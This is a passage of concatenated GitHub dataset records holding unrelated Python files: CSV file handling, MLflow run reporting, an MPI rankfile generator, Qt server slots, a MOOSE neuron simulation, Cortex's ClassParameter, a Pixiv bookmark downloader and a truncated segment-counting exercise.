main()\n","repo_name":"Przemoosz/CodeAdvent2021","sub_path":"Day_4_Challange_1.py","file_name":"Day_4_Challange_1.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31461995775","text":"import csv\nimport os\nimport shutil\nimport time\n\n\n# file ready to be committed\n\narquivoLeitura = open(r\"C:\\Users\\thiag\\Desktop\\bacen\\csv_import\\csv_import.csv\", 'r')\nlinhasEntrada = csv.reader(arquivoLeitura)\nitens = []\n\nfor i in linhasEntrada:\n    itens += i\n\n\nclass Arquivo_entrada():\n\n    def __init__(self, filename):\n        self.file_i = filename\n        self.arquivoentrada = open(os.path.join(\"C:/Users/thiag/Desktop/bacen/Arquivosbacen\", self.file_i), 'r')\n        self.linhas = csv.reader(self.arquivoentrada, delimiter=\";\")\n    def mostrarlinhas(self):\n        for linha in self.linhas:\n            print(linha)\n    def closeFile(self):\n        self.arquivoentrada.close()\n\nclass Arquivo_saida(Arquivo_entrada):\n\n    def __init__(self, filename):\n        Arquivo_entrada.__init__(self, filename)\n        nfile = \"Arquivo Atualizado_\" + filename[-12:-4] + \".csv\"\n        self.file_o = open(os.path.join(\"C:/Users/thiag/Desktop/bacen/Scripts/CSVS - BANCO DE DADOS\", nfile), \"w\", newline=\"\")\n        self.cabecalho = [\"Data\", \"Codigo\", \"Tipo\", \"Moeda\", \"Cotacao em Real: Compra\", \"Cotacao em Real: Venda\", \"Paridades:Compra\", \"Paridades:Venda\"]\n    def novoarquivo(self):\n        writer = csv.writer(self.file_o, delimiter=\",\")\n        # writer.writerow(self.cabecalho)\n        for linha in self.linhas:\n            writer.writerow(linha)\n        self.file_o.close()\n        Arquivo_entrada.closeFile(self)\n\n        # print(\"Novo Arquivo Gerado\")\n\n\n\ndef main():\n    for n in itens:\n        fileDownload = Arquivo_entrada(n)\n        fileDatabase = Arquivo_saida(n)\n        fileDatabase.novoarquivo()\n        fileDownload.closeFile()\n    print(\"Arquivos Gerados\")\n    source = 
\"C:/Users/thiag/Desktop/bacen/Arquivosbacen\"\n destination = \"C:/Users/thiag/Desktop/bacen/importados\"\n for files in itens:\n shutil.move(os.path.join(source,files) , destination)\n return(\"Arquivos Movidos para - \" + destination )\n\n\n","repo_name":"tgomes1992/extracaobacen","sub_path":"leituracsv.py","file_name":"leituracsv.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30061931550","text":"import json\nfrom functools import reduce\nfrom glob import glob\nfrom os import path\n\n# from textwrap import wrap\nimport click\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom mlflow.tracking import MlflowClient\nfrom scipy import stats\n\nfrom src import config\nfrom src.utils.misc import product_dict\n\nmodels = [\n {\n \"name\": \"bagging-rgcn-with-embeddings\",\n \"params\": {\"embeddings_merged_layers\": [True, False]},\n },\n {\n \"name\": \"bagging-mlp\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\n \"name\": \"bagging-logistic-regression\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\n \"name\": \"bagging-rgcn\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\"name\": \"rwr-m\", \"params\": {\"merged_layers\": [True, False],}},\n {\n \"name\": \"bagging-gcn\",\n \"params\": {\"merged_layers\": [True], \"node_features\": [True, False]},\n },\n {\"name\": \"rwr\", \"params\": {\"merged_layers\": [True],}},\n {\"name\": \"label-spreading\", \"params\": {\"merged_layers\": [True],}},\n {\"name\": \"direct-neighbors\", \"params\": {\"merged_layers\": [True],}},\n]\n\n\ndef get_best_runs_by_model(experience_name):\n client = MlflowClient()\n experiments = client.list_experiments()\n experiment = next(ex for ex in experiments if ex.name == experience_name)\n experiment_id = experiment.experiment_id\n\n best_runs_by_model = []\n for model in models:\n for params in product_dict(**model[\"params\"]):\n filter_string = f'params.model=\"{model[\"name\"]}\"'\n\n for param_key, param_value in params.items():\n filter_string += f' and params.{param_key}=\"{param_value}\"'\n\n runs = client.search_runs(\n experiment_id,\n filter_string,\n order_by=[\"metric.auc DESC\"],\n max_results=1,\n )\n\n if not runs:\n continue\n\n run = runs[0]\n\n run_name = run.data.tags[\"mlflow.runName\"]\n for idx, (param_key, param_value) in enumerate(params.items()):\n if idx == 0:\n run_name += f\" | \"\n else:\n run_name += f\", \"\n run_name += f\"{param_key}={param_value}\"\n\n best_runs_by_model.append({\"name\": run_name, \"run\": runs[0]})\n\n return best_runs_by_model\n\n\ndef dict_to_html(dictionary):\n return \"
\".join([f\"{key}={value}\" for key, value in dictionary.items()])\n\n\ndef save_runs(runs, experience_name):\n data = {\n \"Run ID\": [],\n \"Run Name\": [],\n \"Model\": [],\n \"Parameters\": [],\n \"Metrics\": [],\n \"AUC\": [],\n \"AUC Ratio\": [],\n }\n\n for item in runs:\n run = item[\"run\"]\n run_name = item[\"name\"]\n\n data[\"Run ID\"].append(run.info.run_id)\n data[\"Run Name\"].append(run_name)\n data[\"Model\"].append(run.data.params[\"model\"])\n data[\"Parameters\"].append(run.data.params)\n data[\"Metrics\"].append(run.data.metrics)\n data[\"AUC\"].append(run.data.metrics[\"auc\"])\n data[\"AUC Ratio\"].append(run.data.metrics[\"auc_ratio\"])\n\n runs_df = pd.DataFrame(\n data,\n columns=[\n \"Run ID\",\n \"Run Name\",\n \"Model\",\n \"Parameters\",\n \"Metrics\",\n \"AUC\",\n \"AUC Ratio\",\n ],\n dtype=object,\n )\n runs_df.sort_values(by=\"AUC\", ascending=False, inplace=True)\n\n runs_df_tsv = runs_df.copy()\n runs_df_tsv[\"Parameters\"] = runs_df_tsv[\"Parameters\"].apply(json.dumps)\n runs_df_tsv[\"Metrics\"] = runs_df_tsv[\"Metrics\"].apply(json.dumps)\n out_tsv_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model.tsv\"\n )\n print(f\"Saving {out_tsv_file}...\")\n runs_df_tsv.to_csv(out_tsv_file, sep=\"\\t\")\n\n runs_df_html = runs_df.copy()\n runs_df_html[\"Parameters\"] = runs_df_html[\"Parameters\"].apply(dict_to_html)\n runs_df_html[\"Metrics\"] = runs_df_html[\"Metrics\"].apply(dict_to_html)\n out_html_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model.html\"\n )\n print(f\"Saving {out_html_file}...\")\n pd.set_option(\"display.max_colwidth\", -1)\n runs_df_html.to_html(out_html_file, justify=\"justify\", escape=False)\n\n\ndef corrfunc(x, y, ax=None, **kws):\n \"\"\"Plot the correlation coefficient in the top left hand corner of a plot.\"\"\"\n rho, pval = stats.spearmanr(x, y)\n ax = ax or plt.gca()\n ax.annotate(\n f\"$\\\\rho$ = {rho:.2f}, pval={pval:.2f}\", xy=(0.1, 0.9), xycoords=ax.transAxes\n )\n\n\ndef generate_pair_grid(runs, experience_name):\n ranks_dfs = []\n for item in runs:\n run = item[\"run\"]\n run_name = item[\"name\"]\n\n # Get ranks artifact\n abs_artifact_uri = run.info.artifact_uri.replace(\"file://\", \"\")\n results_artifact_uri = path.join(abs_artifact_uri, \"results\")\n ranks_file, *_ = glob(path.join(results_artifact_uri, \"ranks*.tsv\"))\n\n # Load file with ranks\n df = pd.read_csv(ranks_file, sep=\"\\t\")\n run_name = run_name.replace(\" | \", \"\\n\")\n run_name = run_name.replace(\", \", \"\\n\")\n # run_name = \"\\n\".join(wrap(run_name, 25))\n df.rename(columns={\"rank\": run_name}, inplace=True)\n\n ranks_dfs.append(df)\n\n ranks_df = reduce(\n lambda left, right: pd.merge(left, right, on=\"pos_node_index\"), ranks_dfs\n )\n ranks_df = ranks_df.set_index(\"pos_node_index\")\n\n plt.style.use(\"seaborn\")\n plot = sns.pairplot(ranks_df, kind=\"reg\", height=5)\n\n max_rank = ranks_df.max().max()\n plot.set(ylim=(0, max_rank + 1))\n plot.set(xlim=(0, max_rank + 1))\n plot.map_offdiag(corrfunc)\n\n # Save pair plot\n out_png_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model_pairplot.png\"\n )\n print(f\"Saving {out_png_file}...\")\n plot.savefig(out_png_file)\n\n\ndef main(experience_name):\n runs = get_best_runs_by_model(experience_name)\n save_runs(runs, experience_name)\n generate_pair_grid(runs, experience_name)\n\n\n@click.group()\ndef cli():\n pass\n\n\n@click.command()\ndef validation():\n 
main(\"LOOCV\")\n\n\n@click.command()\ndef test():\n main(\"Test\")\n\n\ncli.add_command(validation)\ncli.add_command(test)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"RausellLab/Tiresias","sub_path":"src/reports/best_runs_by_model.py","file_name":"best_runs_by_model.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"1118615624","text":"machines = [x.strip() for x in open(\"machinefile\", \"r\").readlines()]\n\ncores_per_machine = 10\ntotal_cores = 8\n\nwhile total_cores <= 32:\n entry_list = []\n\n for i in range(total_cores):\n machine = i // cores_per_machine\n core = i % cores_per_machine\n entry = machines[machine] + \" slot=0:\" + str(core)\n entry_list.append(entry)\n\n example = \"rank 0=soctf-pdf-003 slot=0:0\"\n\n with open(str(total_cores) + \"rankfile\", \"w\") as f:\n for i in range(65):\n entry = entry_list[i % len(entry_list)]\n f.write(\"rank %d=\" % (i) + entry + \"\\n\")\n\n total_cores *= 2\n","repo_name":"indocomsoft/cs3210-assignment1-mpi","sub_path":"gen_rankfile.py","file_name":"gen_rankfile.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70038930001","text":"from .ServerCommands import (\n ServerConnect,\n ServerCPCreate,\n ServerSCPCreate,\n ServerDSCreate,\n ServerFetchComponents,\n ServerStoreComponent,\n ServerStoreAllComponents,\n ServerDeleteComponent,\n ServerSetMandatoryComponent,\n ServerGetMandatoryComponents,\n ServerUnsetMandatoryComponent,\n ServerFetchDataSources,\n ServerStoreDataSource,\n ServerStoreAllDataSources,\n ServerDeleteDataSource,\n ServerClose)\n\nfrom .EditCommands import (\n ComponentEdit,\n DataSourceApply,\n DataSourceEdit\n)\n\nfrom .ItemCommands import (\n ComponentApplyItem,\n ComponentMerge,\n)\n\n\n# stack with the application commands\nclass ServerSlots(object):\n\n # constructor\n # \\param main the main window dialog\n def __init__(self, main):\n # main window\n self.main = main\n # command stack\n self.undoStack = main.undoStack\n\n # action data\n self.actions = {\n \"actionConnectServer\": [\n \"&Connect ...\", \"serverConnect\",\n \"Ctrl+T\", \"serverconnect\",\n \"Connect to the configuration server\"],\n \"actionFetchComponentsServer\": [\n \"&Fetch Components\", \"serverFetchComponents\",\n \"Ctrl+F\", \"serverfetchdatasources\",\n \"Fetch datasources from the configuration server\"],\n\n \"actionStoreComponentServer\": [\n \"&Store Component\", \"serverStoreComponent\",\n \"Ctrl+B\", \"serverstorecomponent\",\n \"Store component in the configuration server\"],\n\n \"actionStoreAllComponentsServer\": [\n \"&Store All Components\", \"serverStoreAllComponents\",\n \"\", \"serverstoreallcomponents\",\n \"Store all components in the configuration server\"],\n\n \"actionDeleteComponentServer\": [\n \"&Delete Component\", \"serverDeleteComponent\",\n \"Ctrl+H\", \"serverdeletecomponent\",\n \"Delete component from the configuration server\"],\n\n \"actionFetchDataSourcesServer\": [\n \"&Fetch DataSources\", \"serverFetchDataSources\",\n \"Ctrl+Shift+F\", \"serverfetchdatasources\",\n \"Fetch datasources from the configuration server\"],\n\n \"actionStoreDataSourceServer\": [\n \"&Store Datasource\", \"serverStoreDataSource\",\n \"Ctrl+Shift+B\", \"serverstoredatasource\",\n \"Store datasource in the configuration server\"],\n\n \"actionStoreAllDataSourcesServer\": [\n \"&Store All Datasources\", 
\"serverStoreAllDataSources\",\n \"\", \"serverstorealldatasources\",\n \"Store all datasources in the configuration server\"],\n\n \"actionDeleteDataSourceServer\": [\n \"&Delete Datasource\", \"serverDeleteDataSource\",\n \"Ctrl+Shift+H\", \"serverdeletedatasource\",\n \"Delete datasource from the configuration server\"],\n\n \"actionSetComponentMandatoryServer\": [\n \"Set Component Mandatory\", \"serverSetMandatoryComponent\",\n \"\", \"serversetmandatory\",\n \"Set the component as mandatory on the configuration server\"],\n\n \"actionGetMandatoryComponentsServer\": [\n \"Get Mandatory Components\", \"serverGetMandatoryComponents\",\n \"\", \"servergetmandatory\",\n \"Get mandatory components from the configuration server\"],\n\n \"actionUnsetComponentMandatoryServer\": [\n \"Unset Component Mandatory\", \"serverUnsetMandatoryComponent\",\n \"\", \"serverunsetmandatory\",\n \"Unset the component as mandatory on\"\n \" the configuration server\"],\n \"actionCreateStdComponentServer\": [\n \"&Create Standard Component ...\", \"serverSCPCreate\",\n \"\", \"serverscpcreate\",\n \"Create Component defined in online.xml file\"],\n \"actionCreateComponentServer\": [\n \"&Create Online Component ...\", \"serverCPCreate\",\n \"\", \"servercpcreate\",\n \"Create Component defined in online.xml file\"],\n \"actionCreateDataSourcesServer\": [\n \"&Create Online Component ...\", \"serverDSCreate\",\n \"\", \"serverdscreate\",\n \"Create all known DataSources defined in online.xml file\"],\n \"actionCloseServer\": [\n \"C&lose\", \"serverClose\",\n \"Ctrl+L\", \"serverclose\",\n \"Close connection to the configuration server\"]\n }\n\n # connect server action\n # \\brief It connects to configuration server\n def serverConnect(self):\n cmd = ServerConnect(self.main)\n self.undoStack.push(cmd)\n\n # create component action\n # \\brief It creates components and datasources from online.xml\n def serverCPCreate(self):\n cmd = ServerCPCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # create standard component action\n # \\brief It creates stamdard components and datasources from online.xml\n def serverSCPCreate(self):\n cmd = ServerSCPCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # create datasources action\n # \\brief It creates all known datasources from online.xml\n def serverDSCreate(self):\n cmd = ServerDSCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # fetch server components action\n # \\brief It fetches components from the configuration server\n def serverFetchComponents(self):\n cmd = ServerFetchComponents(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # store server component action executed by button\n # \\brief It stores the current component\n # in the configuration server executed by button\n def serverStoreComponentButton(self):\n if self.main.updateComponentListItem():\n cmd = ComponentApplyItem(self.main)\n self.undoStack.push(cmd)\n self.serverStoreComponent(False)\n\n # store server component action\n # \\brief It stores the current component in the configuration server\n def serverStoreComponent(self, focus=True):\n cmd = ComponentEdit(self.main)\n cmd.redo()\n cmd = ComponentMerge(self.main)\n self.undoStack.push(cmd)\n cmd = ServerStoreComponent(self.main)\n cmd.redo()\n if focus:\n self.main.componentList.setItemFocus()\n\n # store server all components action\n # \\brief It stores all components in the configuration server\n def serverStoreAllComponents(self):\n cmd = ComponentApplyItem(self.main)\n cmd = 
ServerStoreAllComponents(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # delete server component action\n # \\brief It deletes the current component from the configuration server\n def serverDeleteComponent(self):\n cmd = ServerDeleteComponent(self.main)\n cmd.redo()\n self.main.componentList.setItemFocus()\n\n # set component mandatory action\n # \\brief It sets the current component as mandatory\n def serverSetMandatoryComponent(self):\n cmd = ServerSetMandatoryComponent(self.main)\n cmd.redo()\n\n # get mandatory components action\n # \\brief It fetches mandatory components\n def serverGetMandatoryComponents(self):\n cmd = ServerGetMandatoryComponents(self.main)\n cmd.redo()\n\n # unset component mandatory action\n # \\brief It unsets the current component as mandatory\n def serverUnsetMandatoryComponent(self):\n cmd = ServerUnsetMandatoryComponent(self.main)\n cmd.redo()\n\n # fetch server datasources action\n # \\brief It fetches datasources from the configuration server\n def serverFetchDataSources(self):\n cmd = ServerFetchDataSources(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # store server datasource action\n # \\brief It stores the current datasource in the configuration server\n def serverStoreDataSource(self, focus=True):\n cmd = DataSourceEdit(self.main)\n cmd.redo()\n cmd = DataSourceApply(self.main)\n self.undoStack.push(cmd)\n cmd = ServerStoreDataSource(self.main)\n cmd.redo()\n if focus:\n self.main.sourceList.setItemFocus()\n\n # store server datasource action executed by button\n # \\brief It stores the current datasource in\n # the configuration server executed by button\n def serverStoreDataSourceButton(self):\n if self.main.updateDataSourceListItem():\n self.serverStoreDataSource(False)\n\n # store server all datasources action\n # \\brief It stores all components in the configuration server\n def serverStoreAllDataSources(self):\n cmd = ServerStoreAllDataSources(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # delete server datasource action\n # \\brief It deletes the current datasource from the configuration server\n def serverDeleteDataSource(self):\n cmd = DataSourceEdit(self.main)\n cmd.redo()\n cmd = ServerDeleteDataSource(self.main)\n cmd.redo()\n self.main.sourceList.setItemFocus()\n\n # close server action\n # \\brief It closes the configuration server\n def serverClose(self):\n cmd = ServerClose(self.main)\n self.undoStack.push(cmd)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"nexdatas/nxsdesigner","sub_path":"nxsconfigtool/ServerSlots.py","file_name":"ServerSlots.py","file_ext":"py","file_size_in_byte":9419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3510676531","text":"# dump_f_i_curves.py --- \n# \n# Filename: dump_f_i_curves.py\n# Description: \n# Author: Subhasis Ray\n# Maintainer: \n# Created: Tue Dec 8 13:11:01 2015 (-0500)\n# Version: \n# Package-Requires: ()\n# Last-Updated: Wed Dec 9 12:28:06 2015 (-0500)\n# By: Subhasis Ray\n# Update #: 79\n# URL: \n# Doc URL: \n# Keywords: \n# Compatibility: \n# \n# \n\n# Commentary: \n# \n# \n# \n# \n\n# Change Log:\n# \n# \n# \n# \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or (at\n# your option) any later version.\n# \n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with GNU Emacs. If not, see <http://www.gnu.org/licenses/>.\n# \n# \n\n# Code:\n\n\"\"\"Do a series of current steps on each celltype\"\"\"\n\nimport numpy as np\ntry:\n    import h5py as h5\nexcept ImportError as e:\n    print( \"[INFO ] h5py is not found. Quitting ...\" )\n    quit()\n\nfrom collections import defaultdict\n\nimport moose\nfrom moose import utils as mutils\n\nfrom cells import SpinyStellate\nfrom cells import DeepBasket\nfrom cells import DeepLTS\n\n\nsimdt = 2.5e-6\nplotdt = 1e-4\n\namps = np.array([-0.1, 0.1, 0.5, 1.0, 1.5])*1e-9\n\ndef run_current_pulse(amps, delay=100e-3, dur=100e-3, trail=100e-3, outfile='f_i_curves_data.h5'):\n    models = []\n    model = moose.Neutral('/model')\n    data = moose.Neutral('/data')\n    ddict = defaultdict(list)\n    for ii, amp in enumerate(amps):\n        mc = moose.Neutral('{}/mc_{}'.format(model.path, ii))\n        models.append(mc)\n        stim = moose.PulseGen('{}/stim_{}'.format(mc.path, ii))\n        stim.delay[0] = delay\n        stim.width[0] = dur\n        stim.level[0] = amp\n        stim.delay[1] = 1e9  # make delay so large that it does not activate again\n        for celltype in [SpinyStellate, DeepBasket, DeepLTS]:\n            cell = celltype('{}/{}_{}'.format(mc.path, celltype.__name__, ii))\n            solver = moose.element('{}/solver'.format(cell.path))\n            solver.dt = simdt\n            solver.target = cell.path\n            stim.connect('output', cell.soma, 'injectMsg')\n            tab = moose.Table('/data/Vm_{}'.format(cell.name))\n            ddict[ii].append(tab)\n            tab.connect('requestOut', cell.soma, 'getVm')\n    mutils.setDefaultDt(elecdt=simdt, plotdt2=plotdt)\n    mutils.assignDefaultTicks(modelRoot='/model', dataRoot='/data', solver='hsolve')\n    moose.reinit()\n    print('Finished scheduling')\n    moose.start(delay + dur + trail)\n    print('Finished simulation')\n    # Save data\n    fd = h5.File(outfile, 'w')\n    for ii, tabs in list(ddict.items()):\n        for tab in tabs:\n            print(('Table', tab.name))\n            node = fd.create_dataset(tab.name, data=tab.vector)\n            node.attrs['current'] = amps[ii]\n            node.attrs['delay'] = delay\n            node.attrs['width'] = dur\n    fd.close()\n    print(('Finished saving data in file', outfile))\n\n\nif __name__ == '__main__':\n    run_current_pulse(amps)\n\n# \n# dump_f_i_curves.py ends here\n","repo_name":"BhallaLab/moose","sub_path":"moose-examples/traub_2005/py/dump_f_i_curves.py","file_name":"dump_f_i_curves.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"72110542800","text":"import IECore\n\n## The ClassParameter is a specialised CompoundParameter which allows its\n# children to be specified by another Parameterised class which is loaded\n# using the ClassLoader. This allows one class to easily nest another while\n# exposing the other's parameters publicly.\nclass ClassParameter( IECore.CompoundParameter ) :\n\n\tdef __init__( self, name, description, searchPathEnvVar, className=\"\", classVersion=0, userData=None ) :\n\n\t\tIECore.CompoundParameter.__init__( self, name, description, userData=userData )\n\n\t\tself.__classInstance = None\n\t\tself.__className = \"\"\n\t\tself.__classVersion = 0\n\t\tself.__searchPathEnvVar = searchPathEnvVar\n\n\t\tself.setClass( className, classVersion, searchPathEnvVar )\n\n\t## Return the class being held. 
If withClassLoaderArgs is True then a tuple is returned\n\t# in the following form : ( class, className, classVersion, searchPathEnvVar ).\n\tdef getClass( self, withClassLoaderArgs=False ) :\n\n\t\tif withClassLoaderArgs :\n\t\t\treturn ( self.__classInstance, self.__className, self.__classVersion, self.__searchPathEnvVar )\n\t\telse :\n\t\t\treturn self.__classInstance\n\n\t## Sets the class being held. The specified class is loaded using a ClassLoader and\n\t# the class' parameters are added to this parameter as children.\n\tdef setClass( self, className, classVersion, searchPathEnvVar=None ) :\n\n\t\tsearchPathToUse = searchPathEnvVar if searchPathEnvVar is not None else self.__searchPathEnvVar\n\n\t\tif ( className, classVersion, searchPathToUse ) == ( self.__className, self.__classVersion, self.__searchPathEnvVar ) :\n\t\t\treturn\n\n\t\tself.__classInstance = None\n\t\tself.clearParameters()\n\n\t\tif className!=\"\" :\n\n\t\t\tloader = IECore.ClassLoader.defaultLoader( searchPathToUse )\n\n\t\t\tself.__classInstance = loader.load( className, classVersion )()\n\n\t\t\tself.addParameters(\n\t\t\t\tself.__classInstance.parameters().values()\n\t\t\t)\n\n\t\tself.__className = className\n\t\tself.__classVersion = classVersion\n\t\tself.__searchPathEnvVar = searchPathToUse\n\n\t@staticmethod\n\tdef _serialise( parameter, value ) :\n\n\t\treturn [\n\n\t\t\tparameter.__className,\n\t\t\tstr( parameter.__classVersion ),\n\t\t\tparameter.__searchPathEnvVar,\n\n\t\t]\n\n\t@staticmethod\n\tdef _parse( args, parameter ) :\n\n\t\tparameter.setClass( args[0], int( args[1] ), args[2] )\n\t\tdel args[0:3]\n\nIECore.registerRunTimeTyped( ClassParameter, IECore.TypeId.ClassParameter )\n\nIECore.ParameterParser.registerType( ClassParameter.staticTypeId(), ClassParameter._parse, ClassParameter._serialise )\n","repo_name":"ImageEngine/cortex","sub_path":"python/IECore/ClassParameter.py","file_name":"ClassParameter.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"3"} +{"seq_id":"7032739332","text":"from Pixiv_Miku_DownloaderAPI.Download_CenterAPI import *\nfrom pixivpy3 import *\nimport os\nimport time\nimport pandas as pd\nimport shutil\nimport copy\n\nsni = False\nif not sni:\n api = AppPixivAPI()\nelse:\n api = ByPassSniApi() # Same as AppPixivAPI, but bypass the GFW\n api.require_appapi_hosts()\n\nMDapi=Pixiv_Miku_Download_API()\nMDapi.login_user()\n\nIDrecord_dic={}\n\n\n\n\n\ndef download_bookmark_and_search(json_results=None,\n IDrecord_lists=[],\n member_id=5545356,\n aim='favorite',\n count=0,\n NF_break_value=-1,\n Illusts_path=os.getcwd()):\n\n if json_results:\n json_results=MDapi.get_next_queue(json_results=json_results,json_result_key=aim)\n else:\n json_results=MDapi.get_json(aim=aim,member_id=member_id)\n Illusts_path=MDapi.create_illusts_dir(aim=aim)\n\n for idx, illust in enumerate(json_results.illusts):\n if aim=='not_favorite' and illust.total_bookmarks>=100 or illust.id in IDrecord_dic['favorite']:\n continue\n image_url = []\n print(idx)\n print(illust)\n count+=1\n print(count)\n print(NF_break_value)\n\n if illust.page_count == 1:\n image_url.append(illust.meta_single_page.get('original_image_url', illust.image_urls.large))\n elif illust.page_count > 1:\n for i in illust.meta_pages:\n image_url.append(i.image_urls.original)\n else:\n continue\n\n for a in image_url:\n api.download(a, path=Illusts_path, name=None)\n print(a)\n IDrecord_lists.append(illust.id)\n\n if count == 
NF_break_value:\n print('stop!!!!!!!!')\n return IDrecord_lists\n\n if json_results.next_url:\n time.sleep(1)\n download_bookmark_and_search(json_results=json_results,\n IDrecord_lists=IDrecord_lists,\n aim=aim,\n count=count,\n NF_break_value=NF_break_value,\n Illusts_path=Illusts_path)\n\n return IDrecord_lists\n \n\n\n\ndef update_bookmark_and_search(json_results=None,\n IDrecord_lists=[],\n member_id=5545356,\n aim='favorite',\n count=0,\n NF_break_value=-1,\n Illusts_path=os.getcwd()):\n\n\n if json_results:\n json_results=MDapi.get_next_queue(json_results=json_results,json_result_key=aim)\n else:\n json_results=MDapi.get_json(aim=aim,member_id=member_id)\n Illusts_path=MDapi.create_illusts_dir(aim=aim)\n\n for idx, illust in enumerate(json_results.illusts):\n if aim=='not_favorite' and illust.total_bookmarks>=100 or illust.id in IDrecord_dic['favorite']:\n continue\n print(idx)\n print(illust)\n print(count)\n print(NF_break_value)\n if aim=='favorite' and illust.id in IDrecord_dic['favorite']:\n print('illust.id in old_F_lists')\n return IDrecord_lists\n image_url = []\n\n count+=1\n\n if illust.page_count == 1:\n image_url.append(illust.meta_single_page.get('original_image_url', illust.image_urls.large))\n elif illust.page_count > 1:\n for i in illust.meta_pages:\n image_url.append(i.image_urls.original)\n else:\n continue\n\n remove_file=False\n if aim == 'favorite' and illust.id in IDrecord_dic['not_favorite']:\n remove_file=True\n\n for a in image_url:\n print(a)\n api.download(a, path=Illusts_path, name=None)\n\n if remove_file:\n print('remove old illust')\n old_NF_file_path = os.path.join(MDapi.create_illusts_dir(aim='not_favorite'), os.path.basename(a))\n print(old_NF_file_path)\n os.remove(old_NF_file_path)\n if remove_file:\n IDrecord_dic['not_favorite'].remove(illust.id)\n\n\n\n IDrecord_lists.append(illust.id)\n\n if count == NF_break_value:\n print('stop!!!!!!!!')\n return IDrecord_lists\n\n if json_results.next_url:\n time.sleep(1)\n update_bookmark_and_search(json_results=json_results,\n IDrecord_lists=IDrecord_lists,\n aim=aim,\n count=count,\n NF_break_value=NF_break_value,\n Illusts_path=Illusts_path)\n\n return IDrecord_lists\n\n\n\n\n\n\"\"\"\nfavorite_IDrecord_lists=download_bookmark_and_search(aim='favorite',member_id=58130520)\nprint(favorite_IDrecord_lists)\nIDrecord_dic={'favorite':favorite_IDrecord_lists}\n\nNF_break_value=len(favorite_IDrecord_lists)\nprint('NF_break_value:'+str(NF_break_value))\n\n\nnot_favorite_IDrecord_lists=download_bookmark_and_search(IDrecord_lists=[],aim='not_favorite',NF_break_value=NF_break_value)\nprint(not_favorite_IDrecord_lists)\nIDrecord_dic['not_favorite']=not_favorite_IDrecord_lists\n\nprint(IDrecord_dic)\ndf=pd.DataFrame.from_dict(IDrecord_dic)\nprint(df)\ndf.to_csv(\"Miku_Illusts_record.csv\", index=False)\n\"\"\"\n\nold_DF_records = pd.read_csv('Miku_Illusts_record.csv')\nprint(old_DF_records)\nIDrecord_dic={'favorite':old_DF_records['favorite'].tolist(),\n 'not_favorite':old_DF_records['not_favorite'].tolist()\n 
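# NOTE (editor): both lists must stay the same length, otherwise\n              # pd.DataFrame.from_dict below raises ValueError; this is why\n              # NF_break_value caps how many not_favorite items are fetched.\n              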
}\nprint(IDrecord_dic)\n\n\n\n\nnew_favorite_lists=update_bookmark_and_search(aim='favorite',member_id=58130520)\ncurrent_favorite_lists=new_favorite_lists+IDrecord_dic['favorite']\n\nprint(len(current_favorite_lists))\nprint(len(IDrecord_dic['not_favorite']))\nIDrecord_dic['favorite']=current_favorite_lists\nprint(IDrecord_dic)\nNF_break_value=len(current_favorite_lists)-len(IDrecord_dic['not_favorite'])\n\nnew_not_favorite_lists=update_bookmark_and_search(IDrecord_lists=[],aim='not_favorite',NF_break_value=NF_break_value)\ncurrent_not_favorite_lists=new_not_favorite_lists+IDrecord_dic['not_favorite']\nIDrecord_dic['not_favorite']=current_not_favorite_lists\ndf=pd.DataFrame.from_dict(IDrecord_dic)\nprint(df)","repo_name":"Wayne40406130/Miku_Favorite_and_NotFavorite_SRDAPI","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32963838995","text":"# The first line contains two integers 1≤n≤50000 and 1≤m≤50000, the number of segments and the number of points on the line, respectively.\n# The next n lines each contain two integers ai and bi (ai≤bi), the coordinates of the segment endpoints.\n# The last line contains m integers, the coordinates of the points.\n# No coordinate exceeds 10^8 in absolute value.\n# A point is considered to belong to a segment if it lies inside the segment or on its boundary.\n# For each point, in input order, print how many segments it belongs to.\n\n\nimport bisect\n\n\ndef inp():\n counts = input()\n count_segments, count_point = map(int, counts.split())\n segments_list = []\n for i in range(count_segments):\n segments_list.append(list(map(int, input().split())))\n points = input()\n points_list = list(map(int, points.split()))\n return segments_list, points_list\n\n\ndef main():\n segments_list, points_list = 